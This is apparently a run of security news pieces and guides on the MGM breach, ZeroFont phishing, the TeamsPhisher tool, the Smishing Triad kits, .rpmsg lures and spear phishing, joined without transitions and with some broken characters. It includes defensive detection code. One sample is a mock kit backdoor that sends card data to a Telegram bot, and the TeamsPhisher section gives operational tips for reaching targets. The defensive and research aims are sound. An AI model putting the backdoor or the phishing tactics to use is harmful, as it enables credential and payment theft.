MGM Resorts recently suffered a devastating cyberattack, with an estimated financial impact of about $100 million. Disclosed on September 11, the attack forced the temporary shutdown of multiple systems across MGM's properties, disrupting operations and causing significant monetary losses.
DETAILS OF THE ATTACK
The digital onslaught on MGM Resorts wasn't confined to a single property but spread across its flagship resort and other prestigious properties like Mandalay Bay, Bellagio, The Cosmopolitan, and Aria. The cybercriminals managed to disrupt a range of operations, from the functioning of slot machines and the systems overseeing restaurant management to the technology behind room key cards. Despite the containment efforts by MGM, the attackers successfully exfiltrated a diverse set of customer data, including but not limited to names, addresses, phone numbers, driver's license numbers, Social Security numbers, and passport details. Fortunately, credit card details remained secure and unaffected.
ECONOMIC FALLOUT
The cyber intrusion had a profound economic impact on MGM Resorts, with losses estimated around $100 million. This financial blow is anticipated to ripple through the earnings of the third and fourth fiscal quarters. However, MGM remains optimistic, projecting a 93% occupancy rate in October and planning for a complete operational recovery in Las Vegas by November. Expenses related to the cyberattack, including consultancy fees, legal services, and other related costs, amounted to less than $10 million.
COMPROMISE OF CUSTOMER DATA
A vast array of customer data, from Social Security numbers to passport details, was pilfered during the cyber attack. The total count of individuals affected by this breach remains uncertain as MGM has not issued any comments on this matter. Proactive measures have been initiated by MGM Resorts to assist the victims of this data breach, including the establishment of dedicated phone lines and informational websites. The company also intends to reach out to the affected individuals via email, extending offers for identity protection services.
IDENTITY OF THE ATTACKERS
Initially, the cyberattack was attributed to hackers affiliated with a group known as Scattered Spider, which later joined forces with the Russian ransomware collective known as BlackCat/ALPHV. Scattered Spider has a notorious reputation, having been implicated in several major attacks over the past year against entities such as Reddit, Riot Games, Coinbase, and another major player in the casino industry, Caesars Entertainment.
RECOVERY AND RESPONSE
In response to the cyberattack, MGM Resorts took immediate action by shutting down all of its systems to thwart further unauthorized access to customer data. Since those initial countermeasures, operations at the company's domestic properties have returned to normal, with the majority of guest-facing systems restored. Efforts are ongoing to bring the remaining affected systems back online, with full restoration anticipated in the near future.
CONCLUSION AND FUTURE IMPLICATIONS
The cyberattack experienced by MGM Resorts highlights the substantial risks and potential financial damages associated with digital security breaches in the hospitality sector. With the compromise of sensitive customer information and the incurrence of hefty financial losses, this incident serves as a stark reminder for all businesses in the industry to bolster their cybersecurity infrastructure to safeguard against future digital threats. The episode underscores the imperative for continuous investments in state-of-the-art cybersecurity mechanisms and protocols to preemptively mitigate the risks of future cyber-attacks and protect sensitive customer data.
Threat actors have begun using an old technique, zero-point font obfuscation, in a new way against Microsoft Outlook users. Instead of using the hidden text to break up the visible content, they use it to make a phishing email appear to have been scanned and cleared by an antivirus product. The fake reassurance is aimed at the recipient rather than at the mail filter, and it raises the chance that the target trusts and acts on the message.
Jan Kopriva, an analyst at the SANS Internet Storm Center, encountered a phishing email that cleverly employed text written in zero-size font. This technique, originally documented by Avanan (a Check Point company) researchers in 2018 and known as ZeroFont phishing, was being used in a distinct and innovative manner, according to Kopriva's observations. Historically, attackers have inserted zero-size text into phishing emails to break up the visible text, making it harder for automated scanners such as the ones Outlook uses to flag suspicious messages.
However, Kopriva noticed a variation that diverged from the technique's original purpose. Instead of using it to stop automated scanners from labeling the email as harmful or fraudulent, it was applied to craft an illusion of trustworthiness for the recipient. The technique was used to modify the text shown in Outlook's listing pane, the panel next to the message body that gives users a preview of the email content.
Rather than showing the usual subject line followed by the first few lines of the email, which could raise red flags about a phishing attempt, the listing pane displayed the subject line and an additional line of text. This added text falsely claimed that the email had been scanned and deemed safe by a threat protection service.
Avanan researchers have also documented another variation, dubbed the "One Font" technique. In these cases, threat actors embed extremely small text, in the zero- or one-point range, to build more elusive phishing lures. The tiny text defeats email scanners that rely on semantic analysis, confusing the scanner while staying invisible to the recipient.
In the phishing email Kopriva analyzed, the attackers inserted text implying the email had been verified and secured, placed in zero-size font ahead of the email's actual content. As a result, in Outlook's listing pane the user saw the fake security status immediately below the subject line, instead of the true opening line of the phishing email. The approach abuses the way Outlook builds its preview from the message text.
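The listing-pane spoof can be reproduced and checked for offline. The following Python is an added example, not code from the SANS ISC diary or from Avanan: it parses a constructed HTML message, separates the text a human sees from text hidden with font-size 0 (or up to 1px/1pt, which covers the One Font variant), and reports whether hidden text precedes the visible body, which is the condition that lets a preview pane built from the raw text stream show it first.

```python
"""Separate visible from zero-size ("ZeroFont") text in an HTML email body.

Added example for this page; not code from the SANS ISC diary or from Avanan.
The sample message below is constructed.
"""
import re
from html.parser import HTMLParser

# Inline font-size declarations: font-size:0; font-size: 0px; font-size:1pt; ...
_SIZE_RE = re.compile(r"font-size\s*:\s*(\d+(?:\.\d+)?)\s*(px|pt|em|rem|%)?", re.I)
# Elements that never get a closing tag, so they must not touch the open-element stack.
_VOID = {"br", "img", "hr", "meta", "link", "input", "area", "base", "col", "wbr"}


def _is_tiny(style: str, threshold: float = 1.0) -> bool:
    """True if the inline style sets a font size a human cannot read.

    0 in any unit is hidden; absolute sizes up to `threshold` px/pt cover the
    "One Font" variant. Non-zero relative units are treated as visible.
    """
    m = _SIZE_RE.search(style or "")
    if not m:
        return False
    size, unit = float(m.group(1)), (m.group(2) or "px").lower()
    if unit in ("em", "rem", "%"):
        return size == 0
    return size <= threshold


class _ZeroFontParser(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self._hidden_stack = []   # one bool per open element: is its text hidden?
        self.chunks = []          # (hidden: bool, text) in document order

    def handle_starttag(self, tag, attrs):
        if tag in _VOID:
            return
        parent_hidden = self._hidden_stack[-1] if self._hidden_stack else False
        style = dict(attrs).get("style") or ""
        self._hidden_stack.append(parent_hidden or _is_tiny(style))

    def handle_endtag(self, tag):
        if tag not in _VOID and self._hidden_stack:
            self._hidden_stack.pop()

    def handle_data(self, data):
        text = data.strip()
        if text:
            hidden = bool(self._hidden_stack) and self._hidden_stack[-1]
            self.chunks.append((hidden, text))


def analyze(html: str) -> dict:
    """Report visible text, hidden text, and whether hidden text leads the body.

    A preview pane built from the raw text stream shows the *first* text in
    the document; if that text is hidden in the rendered view, the preview and
    the rendered message disagree (the listing-pane spoof).
    """
    p = _ZeroFontParser()
    p.feed(html)
    p.close()
    visible = " ".join(t for h, t in p.chunks if not h)
    hidden = " ".join(t for h, t in p.chunks if h)
    leads_with_hidden = bool(p.chunks) and p.chunks[0][0]
    return {
        "visible": visible,
        "hidden": hidden,
        "has_hidden_text": bool(hidden),
        "preview_spoof": leads_with_hidden,
    }


# Constructed sample: a fake "scanned" line in zero-size font ahead of the real
# body, plus a zero-size fragment that splits a visible word (the older use).
SAMPLE_HTML = """<html><body>
<span style="font-size:0px">Scanned by Advanced Threat Protection. No threats found.</span>
<p>Your mailbox is <span style="font-size:0">xx</span>almost full.
Click <a href="http://example.invalid/verify">here</a> to verify your account.</p>
</body></html>"""

if __name__ == "__main__":
    for key, value in analyze(SAMPLE_HTML).items():
        print(f"{key}: {value}")
```

Run it as a script to see the two views of the same message side by side. The "preview_spoof" flag is the signal worth alerting on at a gateway: hidden text that merely breaks up words is the old evasion, but hidden text that comes first is the lure described here.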
Kopriva acknowledged that this tactic may have been in use undetected for a while. Nonetheless, it is one more tool in the phishing arsenal, and defenders need to be aware of it. He recommends that organizations running phishing-focused security awareness training cover this technique, so that employees can recognize and respond appropriately to emails that use it to appear pre-scanned.
TeamsPhisher is a Python 3 tool designed to make it easier to deliver phishing messages and attachments to Microsoft Teams users whose organizations allow external communication. In most circumstances it is not possible to send files to Teams users outside one's own organization. Recently, Max Corbridge (@CorbridgeMax) and Tom Ellson (@tde_sec) of JUMPSEC published a way to bypass this restriction by modifying the HTTP requests made by Teams so that a message with an attached file is delivered to a different recipient.
TeamsPhisher combines this with a number of other techniques, including some of Andrea Santese's (@Medu554) older ones. For the authentication part of the attack flow, as well as other basic utility functions, it relies heavily on TeamsEnum, a brilliant piece of work by Bastian Kanbach (@bka) of SSE.
TeamsPhisher's goal is to pull together the most useful parts of those projects into a robust, fully adaptable and highly effective way for authorized red team operations to use Microsoft Teams for phishing in access-related scenarios.
You provide TeamsPhisher with an attachment, a message and a list of targets. It uploads the attachment to the sender's SharePoint and then works through the target list.
For each target, TeamsPhisher first enumerates the user to check that the account exists and can receive messages from external organizations. It then opens a new conversation with that user. Technically this is a "group" conversation, because TeamsPhisher includes the target's email address twice; this is a clever trick from @Medu554 that bypasses the "Someone outside your organization messaged you, are you sure you want to view it" splash screen, which might otherwise give the target a reason to stop and think twice before viewing the message.
Once the new thread exists between the sender and the target, the target receives the message together with a link to the attachment stored in SharePoint.
After this first message is sent, the new thread is visible in the sender's Teams GUI and can be engaged with manually, case by case, if needed. To use TeamsPhisher you need a Microsoft business account (not a personal @hotmail, @outlook or similar account) that is licensed for both Teams and SharePoint.
That means you need an AAD tenant and at least one user with a matching license. At the time of writing, the AAD licensing center offers free trial licenses that satisfy all of the prerequisites for using this tool.
Before the account can be used with TeamsPhisher, you must have logged into the personal SharePoint site of the sending user at least once. The site will be something like tenantname-my.sharepoint.com/personal/myusername_mytenantname_onmicrosoft.com, or tenantname-my.sharepoint.com/personal/myusername_mytenantname_mycustomdomain_tld if the tenant uses a custom domain.
Local requirements: we strongly advise using the most recent version of Python 3. You will also need Microsoft's authentication library for Python (the msal package).
--sharepoint: manually specify the name of the SharePoint site to upload the file to. This is most likely needed when the sender's tenant uses a custom domain (one that does not follow the xxx.onmicrosoft.com convention). Use only the short name; for instance, if your SharePoint site is at mytest.sharepoint.com, pass --sharepoint mytest.
Replace TeamsPhisher's default greeting ("Hi,") with a personalized greeting that will be prepended to the message supplied with --message, for example "Good afternoon," or "Sales team,".
--securelink: by default, the SharePoint link sent to targets can be opened by anyone who has the link; use --securelink to restrict the file so that only the target who received it can view it. This may help keep your payload away from the blue team.
--personalize: TeamsPhisher will try to work out each target's first name and use it in the greeting. For instance, tom.jones@targettenant.onmicrosoft.com would receive a message starting "Hi Tom,". This is imperfect and depends on the format of the target addresses; use --preview to check whether it is a good fit for your target list.
--preview: run TeamsPhisher in preview mode. This will NOT send any messages to the targets; instead, it shows the "friendly" name that --personalize would use, and sends a sample message reflecting the current settings to the sender's own Teams. You can log in to see how the message renders and make any adjustments.
A delay of x seconds can be set between messages to targets, which helps with rate-limiting concerns.
TeamsPhisher will determine which accounts are unable to receive messages from third-party organizations, which accounts do not exist, and which accounts have subscription plans that are incompatible with the attack vectors.
TeamsPhisher now enables login with sender accounts using multifactor authentication (MFA), thanks to code contributed by the TeamsEnum project.
If you use --securelink, the recipients will see a prompt asking them to authenticate before they can view the attachment in SharePoint. You can decide whether this adds too many extra steps or whether sending them through the genuine Microsoft login flow adds "legitimacy".
Mitigation
Organizations can reduce the risk posed by this technique by changing the external access options, which are found in the Microsoft Teams admin center under Users > External access.
Microsoft gives organizations the flexibility to choose the permissions that match their requirements, including allowlisting only specific external tenants for communication and a global block that prevents any external communication.
Resecurity has identified a large-scale smishing campaign, tracked as Smishing Triad, targeting US citizens.
Earlier episodes have revealed victims in the U.K., Poland, Sweden, Italy, Indonesia, Japan and other countries; the group impersonated the Royal Mail, New Zealand Post (NZPOST), Correos (Spain), PostNord, Poste Italiane and the Italian Revenue Agency (Agenzia delle Entrate). Similar scams have previously targeted FedEx and UPS.
The actors, attributed to Chinese-speaking cybercriminals, use a package-tracking text scam sent via iMessage to collect personal (PII) and payment information from victims for identity theft and credit card fraud. The group has been named "Smishing Triad" because it uses smishing as its main attack vector and operates out of China.
Smishing is a form of phishing that involves a text message or phone number. Victims will typically receive a deceptive text message that is intended to lure the recipient into providing their personal or financial information. These scammers often attempt to disguise themselves as a government agency, bank, or other organization to lend legitimacy to their claims, for example, a postal service like the United States Postal Service (USPS), asking to pay additional delivery fees via credit card. Once the victim shares payment information, the bad actors use it for fraudulent purposes and unauthorized charges.
Anticipating a spike in this activity over the summer, USPS issued a timely warning about the growing risk of package-tracking text scams sent via SMS and iMessage. The spike was observed in August, with a large number of domain names registered by the attackers.
A notable detail of the Smishing Triad campaign is that the actors used only iMessage, sent from compromised Apple iCloud accounts, as the delivery method for their malicious messages, instead of the traditional SMS or calls used in scam campaigns such as PostalFurious and RedZei that other researchers have documented in the past.
Smishing Triad also attacks online-shopping platforms and injects malicious code to intercept customer data. Around July 19, 2023, a campaign by the same actors was identified targeting popular online-shopping platforms with malicious pages containing a payment form impersonating Sumitomo Mitsui Banking Corporation (SMBC). Around the same time, customized forms impersonating the New Zealand Transport Agency and the Agenzia delle Entrate (the Italian Revenue Agency, which enforces Italy's financial code and collects taxes) were also identified.
The actors also distribute a fake online-shop engine (TrickyCart) that lets them defraud consumers with a pseudo 3-D Secure payment form impersonating popular payment systems and e-commerce platforms, including Visa, Mastercard and PayPal.
Smishing Triad runs its own Telegram channel with over 2,725 members and several private groups. The actors arm other cybercriminals by selling them customized "smishing kits" targeting popular U.S., U.K. and EU brands, starting at $200 per month on a subscription basis with ongoing support. Resecurity identified a group of domain names used by Smishing Triad, registered in the .top zone via NameSilo and fronted by Cloudflare around August 2023. Notably, some of those domains are still live, as is the Telegram group run by the actors.
After acquiring the smishing kit, Resecurity identified a vulnerability that acts as a hidden backdoor in the code, allowing the kit's authors to silently extract the personal and payment data collected by their own customers. According to the researchers, this pattern is common in password stealers and phishing kits: it lets the kit authors profit from their clients' efforts, or at least monitor their activity. Resecurity was able to recover over 108,044 records of compromised victim data in order to alert the victims about identity theft. The information has been shared with relevant law enforcement agencies and the United States Postal Inspection Service.
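Kit backdoors of the kind described above are usually found by reading the kit's source for a second exfiltration channel. The Python below is an added example, not Resecurity's analysis and not code from the actual Smishing Triad kit: it scans a constructed two-file PHP kit, decodes base64 string literals (a common way kit authors hide an extra address), and lists every email address or URL that is not the recipient the kit operator configured. The file names, the $to_email variable, the operator address and the hidden destinations are all constructed for the example.

```python
"""Find hidden exfiltration destinations in a phishing kit's PHP source.

Added example for this page; not Resecurity's analysis and not code from the
actual Smishing Triad kit. The kit files, the $to_email variable, the
"operator" address and the hidden destinations are all constructed.
"""
import base64
import re
from typing import Dict, Iterator, List, Optional, Set

# Destinations the kit author buried in base64 so a casual reader of send.php
# does not see them. Encoded here so the constructed sample always decodes.
_HIDDEN_URL = "https://api.telegram.org/bot123456:sk-abc/sendMessage"
_HIDDEN_MAIL = "dev@example.net"


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed kit: config.php is what the kit buyer edits; send.php is the
# posted-form handler that also leaks the same data to the kit author.
KIT_FILES: Dict[str, str] = {
    "config.php": '<?php $to_email = "operator@example.com"; ?>',
    "send.php": (
        '<?php include "config.php";\n'
        '$body = "card=".$_POST["cc"]."|exp=".$_POST["exp"]."|cvv=".$_POST["cvv"];\n'
        'mail($to_email, "New Result", $body);\n'
        '// "anti-bot" helper (actually the backdoor)\n'
        f'$h = base64_decode("{_b64(_HIDDEN_URL)}");\n'
        f'mail(base64_decode("{_b64(_HIDDEN_MAIL)}"), "New Result", $body);\n'
        '@file_get_contents($h."?chat_id=1&text=".urlencode($body));\n'
        '?>'
    ),
}

_STR_RE = re.compile(r'"([^"\\]*)"|\'([^\'\\]*)\'')   # PHP string literals (no escapes)
_B64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")
_EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
_URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def _literals(php: str) -> Iterator[str]:
    for m in _STR_RE.finditer(php):
        yield m.group(1) if m.group(1) is not None else m.group(2)


def _decode_if_b64(s: str) -> Optional[str]:
    """Decode a literal that looks like base64 and yields printable text."""
    if not _B64_RE.match(s):
        return None
    try:
        out = base64.b64decode(s, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return out if out.isprintable() else None


def configured_recipients(kit: Dict[str, str]) -> Set[str]:
    """Addresses the kit operator configured: the one channel that is expected."""
    return set(_EMAIL_RE.findall(kit.get("config.php", "")))


def find_hidden_destinations(kit: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each non-config file to the emails/URLs it contains, plain or
    base64-wrapped, that are not among the configured recipients."""
    allowed = configured_recipients(kit)
    findings: Dict[str, List[str]] = {}
    for name, src in kit.items():
        if name == "config.php":
            continue
        dests: List[str] = []
        for lit in _literals(src):
            for text in (lit, _decode_if_b64(lit)):
                if text is None:
                    continue
                for hit in _EMAIL_RE.findall(text) + _URL_RE.findall(text):
                    if hit not in allowed and hit not in dests:
                        dests.append(hit)
        if dests:
            findings[name] = dests
    return findings


if __name__ == "__main__":
    for fname, dests in find_hidden_destinations(KIT_FILES).items():
        print(f"{fname}: {dests}")
```

Running the script prints send.php together with the Telegram bot URL and the second mailbox that the operator never configured. Real kits also hide destinations with str_rot13, hex escapes or concatenated fragments, so in practice each extra decoder is added to the `(lit, _decode_if_b64(lit))` tuple.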
Resecurity noted that it can be difficult to disrupt cybercriminal activity by foreign actors located in jurisdictions such as China without proper law enforcement and industry collaboration. Resecurity is therefore sharing its information about Smishing Triad with the wider community and with network defenders to raise awareness and help them safeguard their customers.
Further technical details are available in the report published by Resecurity.
Phishers are using encrypted restricted-permission messages (.rpmsg) attached in phishing emails to steal Microsoft 365 account credentials.
"[The campaigns] are low volume, targeted, and use trusted cloud services to send emails and host content (Microsoft and Adobe)," say Trustwave researchers Phil Hay and Rodel Mendrez. "The initial emails are sent from compromised Microsoft 365 accounts and appear to be targeted towards recipient addresses where the sender might be familiar."
Phishing emails with Microsoft Encrypted Restricted Permission Messages
The phishing emails are sent from a compromised Microsoft 365 account to individuals working in the billing department of the recipient company.
(Figure: phishing email with an encrypted restricted-permission message. Source: Trustwave)
The emails contain a .rpmsg (restricted permission message) attachment and a âRead the messageâ button with a long URL that leads to office365.com for message viewing.
To see the message, the victims are asked to sign in with their Microsoft 365 email account or to request a one-time passcode.
After using the received passcode, the victims are first shown a message with a fake SharePoint theme and are asked to click on a button to continue. They are then redirected to a document that looks like it's hosted on SharePoint but is actually hosted on Adobe's InDesign service.
They are again asked to click on a button to view the document, and are taken to a domain that looks like the one from the original sender (e.g., Talus Pay), featuring a progress bar.
In the background, the open source FingerprintJS library collects the userâs system and browser information and, finally, the victim is shown a spoofed Microsoft 365 login page and is asked to sign in with their credentials.
Hiding from security solutions
"The use of encrypted .rpmsg messages means that the phishing content of the message, including the URL links, are hidden from email scanning gateways. The only URL link in the body of the message points to a Microsoft Encryption service," Hay and Mendrez noted.
"The only clue that something might be amiss is the URL has a specified sender address (chambless-math.com) unrelated to the From: address of the email. The link was likely generated from yet another compromised Microsoft account."
They advise organizations to:
Block, flag or manually inspect .rpmsg attachments
Monitor incoming email streams for emails originating from MicrosoftOffice365@messaging.microsoft.com and having the subject line âYour one-time passcode to view the messageâ
Educate users about the consequences of decrypting or unlocking content from unsolicited emails
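The three recommendations above can be turned into a mail-flow check. The Python below is an added example, not Trustwave's detection logic: it parses a constructed .eml, flags a .rpmsg attachment (by extension and by the application/x-microsoft-rpmsg-message content type, which is assumed here to be what the attachment carries), compares the sender named in the encryption link against the From: header (the portal link shape and its sender= query parameter are constructed for the example, as are all addresses and domains), and recognises the one-time-passcode notification Trustwave mentions.

```python
"""Mail-flow checks for the .rpmsg credential-phishing pattern described above.

Added example for this page; not Trustwave's detection logic. The sample
message, every address and domain, the portal link shape and its sender=
parameter are constructed. The rpmsg MIME type below is an assumption.
"""
import email
import re
from email import policy
from email.utils import parseaddr
from typing import Dict, List
from urllib.parse import parse_qs, urlparse

RPMSG_TYPES = {"application/x-microsoft-rpmsg-message"}  # assumed attachment type
OME_NOTIFIER = "microsoftoffice365@messaging.microsoft.com"
OME_SUBJECT = "your one-time passcode to view the message"
_URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def _domain(addr: str) -> str:
    return parseaddr(addr)[1].rpartition("@")[2].lower()


def analyze_message(raw: str) -> Dict[str, object]:
    """Return the findings a gateway rule would raise for one raw RFC 5322 message."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings: List[str] = []
    from_hdr = str(msg.get("From", ""))
    from_domain = _domain(from_hdr)

    # 1. Block/flag .rpmsg attachments: the real content is inside and unscannable.
    text = ""
    for part in msg.walk():
        name = (part.get_filename() or "").lower()
        if name.endswith(".rpmsg") or part.get_content_type() in RPMSG_TYPES:
            findings.append(f"rpmsg attachment: {name or part.get_content_type()}")
        elif part.get_content_maintype() == "text":
            text += part.get_content()

    # 2. The only visible link points at the encryption portal; the sender it
    #    names (constructed sender= parameter) should agree with the From: header.
    for url in _URL_RE.findall(text):
        for sender in parse_qs(urlparse(url).query).get("sender", []):
            if _domain(sender) != from_domain:
                findings.append(
                    f"encryption link sender {sender} does not match From: domain {from_domain}"
                )

    # 3. The OME passcode mail itself is legitimate, but seeing it tells you a
    #    user is in the middle of unlocking such a message.
    subject = str(msg.get("Subject", "")).strip().lower()
    if parseaddr(from_hdr)[1].lower() == OME_NOTIFIER and OME_SUBJECT in subject:
        findings.append("one-time passcode notification: check what the user is unlocking")

    return {"from": from_hdr, "findings": findings, "suspicious": bool(findings)}


# Constructed sample modelled on the campaign: compromised-looking sender,
# billing recipient, portal link naming a different sender, .rpmsg attached.
SAMPLE_EML = """\
From: Accounts Payable <ap@sender.example>
To: billing@victim.example
Subject: Protected invoice
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<p>You have received a protected message.</p>
<a href="https://portal.example/encryption/retrieve?sender=finance%40lookalike.example&msgid=1">Read the message</a>
--b1
Content-Type: application/x-microsoft-rpmsg-message; name="message.rpmsg"
Content-Disposition: attachment; filename="message.rpmsg"
Content-Transfer-Encoding: base64

AAAA
--b1--
"""

if __name__ == "__main__":
    for line in analyze_message(SAMPLE_EML)["findings"]:
        print(line)
```

The first two checks fire on the lure itself; the third fires on Microsoft's own notification, so it is a hunting query (who requested a passcode, and for which message) rather than a block rule.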
Every day tens of thousands of spear phishing emails are sent to victims around the world.
Cyber-attacks take different pathways now; they can strike from inside or outside and do equal damage across your network.
A targeted attack that has been researched and executed with precision can be critical.
In this guide, we'll look at spear phishing attacks, techniques, examples, mitigation procedures and a few best practices.
What is Spear Phishing?
Spear phishing is a malicious practice carried out through email campaigns in which attackers research their target audience, understand their likes and dislikes, study their day-to-day operations, and customize the email to steal sensitive data or install malware. Deploying this kind of targeted email campaign to infiltrate a specific group is called a spear phishing attack.
Any unsolicited email that lands in your inbox from an unknown sender may be a phishing attack. Blasting millions of emails to a database of addresses with malicious intent is plain phishing.
It may aim to deploy malware, achieve remote code execution and more; however, untargeted phishing is often not very rewarding for the attacker, which is what makes the targeted variant attractive.
How does Spear Phishing Attack Work?
Spear Phishing is executed in four stages,
Target identification
Studying the targetâs behavior
Customizing the message
Blasting emails
Target identification:
The attackers first identify their victims by narrowing down the audience according to the motive of the campaign; this could be companies in a particular vertical or the patients of a healthcare provider.
The identification procedure has two stages, a primary and a secondary target. The primary targets are, for example, executives of a multinational who will receive the emails; the secondary targets are the people who hold access to business-sensitive information.
Primary targets who fall for the spear phishing email are then used to reach the secondary targets.
Studying the targetâs behavior:
The attackers gather information about their targets by digging into social media profiles, job sites, portfolios, comments, likes and the groups and communities the targets belong to. One way or another they obtain personal details such as email address, phone number, first name and surname, work history, schooling, college and area of expertise, which they then use to influence the potential targets.
Customizing the message
Attackers customize their emails and messages based on the information collected from these external sources, for better open rates and fewer bounces. Once a convincing message has been crafted, they proceed to sending it.
Blasting emails
After all the research, the attackers prepare their delivery vector and strategy to ensure the mail lands in the target's inbox and not in the spam folder.
They disguise the sender details to look legitimate, so that the mail is delivered and the end user opens it as expected.
After opening the email, the user clicks a link or downloads an attachment, because the content has been made to look accurate.
With all that research, the click-through rate will be high, thanks to the care the attackers put into crafting the mail.
What are 3 types of Spear-phishing emails?
Usually, hackers prefer one of three techniques below to manipulate their target audience.
Impersonation
Personalization
Emotional Response
Impersonation
As the name suggests, attackers pretend to be someone else or a legal entity to establish trust and make off with data. This technique is very commonly used by putting a genuine person or entity in the sender field together with a plausible subject line.
Personalization
This technique has a high success rate, because the message is so tailored to the recipient that they believe the email is useful to them or relevant to their profession.
Emotional Response
This technique creates fear, happiness, shock or surprise to make the end user open the mail and click or download the malicious content as planned.
What is an example of spear phishing?
Spear phishing attacks are highly targeted and often have disastrous outcomes for enterprises; below are a few examples of successful attacks.
Ubiquiti Networks Inc
The company lost more than USD $40 million in 2015 to a spear phishing attack in the form of CEO fraud. The emails impersonated senior executives and requested transfers of funds to a third party in Hong Kong, which turned out to be an anonymous entity rather than a genuine business partner.
RSA
RSA is a leading security firm, but even it fell victim to a targeted spear phishing attack in 2011.
Emails with the subject line "2011 Recruitment Plan" were sent to employees; most were caught as spam, but one user opened the message, which led to malware being deployed on the system and eventually gave the attackers remote access to the computer and the network.
Amazon
Amazon is another leader among the Fortune 500; impersonating a brand this well known improves the attacker's success rate.
In 2016, a large phishing campaign targeted Amazon customers with the subject line "Your Amazon.com order has been dispatched", followed by an order code.
However, unlike genuine Amazon emails, where the dispatch status is shown directly in the mail or in your Amazon account, here the details were said to be in the attachment.
A few recipients fell for this, and the Locky ransomware was downloaded and installed on their systems, encrypting data and demanding a ransom.
How can you protect yourself from phishing?
Spear phishing prevention depends on several factors, such as awareness, tools, education and emotional response. Below are the best practices that both organizations and individuals should follow to protect themselves from phishing:
Increasing cyber awareness
Employing cyber tools
Identifying fake emails
Avoiding clicks and attachments
Avoid mails that force urgency
According to a report from Intel Security, 97% of people tested were unable to identify all of the phishing emails in the test. The best approach to spear phishing prevention is to create cyber awareness and improve cyber education. Prevention is a process that depends on a number of factors and on how precisely each is applied.
Increasing cyber awareness:
Organizations and individuals should improve their cyber awareness, either on their own or through published guidelines. Understanding the attack vectors, their mechanisms and procedures helps end users prepare for potential phishing scams and avoid them at all times.
Employing cyber tools
As already mentioned, no tool alone stops phishing, but properly configured browser policies, email filters and endpoint configurations reduce the chances of becoming a victim. Group Policy settings that enforce stronger passwords, together with firewall configuration, can also help organizations protect their users against phishing mail.
Identifying fake emails
Users can distinguish a genuine mail from a fake one by looking at the subject line, the sender and whether the message is relevant to them, and then re-confirming against the content of the email. Any unknown sender, or a stated purpose that does not fit, could be a phishing scam.
Avoiding clicks and attachments
Not all phishing scams trigger when the mail is opened; most are set off only when the link in the mail is clicked or an attachment is opened. Users should therefore check links and attachments, for example by hovering over the link to see where it really points or by inspecting the attachment's file type.
Avoid mails that force urgency
Users should be wary of emails that create urgency; the emotional response is what makes people fall for this kind of phishing. Any emotional mail that creates fear, surprise or shock, or a personalized pitch based on your taxes or health records, should be treated with suspicion.
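The "identifying fake emails" tells above (sender, subject, relevance) and the urgency cue can be scored mechanically. The Python below is an added example, not code from the original guide: it checks a message's From and Reply-To headers against a constructed allowlist of trusted brands and domains, catches lookalike domains by a character-skeleton comparison (rn for m, 0 for o and so on) and a small edit distance, and counts urgency phrases in the body. The trusted brands, domains, phrase list, sample headers and body text are all constructed.

```python
"""Header and wording checks for the spear phishing tells listed in this guide.

Added example for this page; not code from the original guide. The trusted
brands/domains, the urgency phrases, and both sample messages are constructed.
"""
from email.utils import parseaddr
from typing import Dict, List, Optional

# Constructed allowlist: brand word expected in display names -> its real domain.
TRUSTED_BRANDS: Dict[str, str] = {"acme": "acme.example", "northbank": "northbank.example"}
URGENCY_PHRASES = (
    "immediately", "urgent", "within 24 hours", "account will be suspended",
    "wire", "overdue", "final notice",
)


def _skeleton(domain: str) -> str:
    """Collapse common lookalike substitutions so acrne/acme or acrn3 compare equal."""
    label = domain.lower().split(".")[0]
    label = label.replace("rn", "m").replace("vv", "w").replace("cl", "d")
    return label.translate(str.maketrans("01357", "olest"))


def _edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(domain: str) -> Optional[str]:
    """Return the trusted domain this one imitates, or None if trusted or unrelated."""
    trusted = set(TRUSTED_BRANDS.values())
    if domain in trusted:
        return None
    for t in trusted:
        if _skeleton(domain) == _skeleton(t) or _edit_distance(domain, t) <= 2:
            return t
    return None


def triage(headers: Dict[str, str], body: str) -> Dict[str, object]:
    """Score one message: each independent tell adds one point."""
    reasons: List[str] = []
    display_name, from_addr = parseaddr(headers.get("From", ""))
    from_domain = from_addr.rpartition("@")[2].lower()

    # Sender: display name borrows a trusted brand but the address is not that brand's domain.
    for brand, real_domain in TRUSTED_BRANDS.items():
        if brand in display_name.lower() and from_domain != real_domain:
            reasons.append(f"display name claims {brand} but address is @{from_domain}")
            break

    # Sender: lookalike domain (typo, homoglyph, digit substitution).
    imitated = lookalike_of(from_domain)
    if imitated:
        reasons.append(f"sender domain {from_domain} resembles {imitated}")

    # Sender: replies are routed to a different domain than the one that wrote.
    reply_addr = parseaddr(headers.get("Reply-To", ""))[1]
    reply_domain = reply_addr.rpartition("@")[2].lower()
    if reply_addr and reply_domain != from_domain:
        reasons.append(f"Reply-To goes to @{reply_domain}")

    # Content: pressure to act now.
    low = body.lower()
    cues = [p for p in URGENCY_PHRASES if p in low]
    if cues:
        reasons.append("urgency cues: " + ", ".join(cues))

    score = len(reasons)
    return {"score": score, "reasons": reasons, "verdict": "review" if score >= 2 else "ok"}


# Constructed samples.
SAMPLE_PHISH = (
    {"From": "ACME Finance <cfo@acrne.example>", "Reply-To": "cfo.acme@webmail.example"},
    "Please process the attached wire immediately; the vendor account will be suspended otherwise.",
)
SAMPLE_LEGIT = (
    {"From": "Jane Doe <jane@acme.example>"},
    "Attached are the meeting notes from Tuesday. No action needed.",
)

if __name__ == "__main__":
    for hdrs, text in (SAMPLE_PHISH, SAMPLE_LEGIT):
        print(triage(hdrs, text))
```

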